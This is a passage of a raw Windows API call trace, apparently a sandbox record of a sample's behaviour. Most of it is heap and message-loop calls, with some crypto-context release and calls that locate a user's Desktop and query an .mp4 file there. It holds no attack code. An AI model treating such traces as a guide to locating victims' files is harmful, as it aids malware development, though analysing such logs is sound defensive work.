hHeap=0x970000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.816] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0209.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0209.817] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.817] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.817] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.817] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0209.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.817] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.818] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0209.818] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0209.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.818] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.818] FreeLibrary (hLibModule=0x756e0000) returned 1 [0209.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.819] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0209.819] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0209.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0209.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0209.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0209.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.820] CloseHandle (hObject=0x2d0) returned 1 [0209.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0209.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0209.896] TranslateMessage (lpMsg=0x8cf708) returned 0 [0209.896] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0209.896] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0209.896] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0209.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0209.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0209.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0209.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0209.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.898] CloseHandle (hObject=0x2a0) returned 1 [0209.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0209.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0209.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0209.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0209.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0209.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0209.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0209.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0209.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0209.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0209.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0209.907] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0209.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42) returned 0x2e563a8 [0209.909] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/VstT.mp4", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4", lpFilePart=0x8cedf4*="VstT.mp4") returned 0x20 [0209.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0209.909] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VstT.mp4" (normalized: 